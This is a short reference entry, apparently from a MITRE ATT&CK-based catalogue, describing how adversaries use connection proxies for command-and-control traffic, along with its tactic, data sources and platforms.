Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre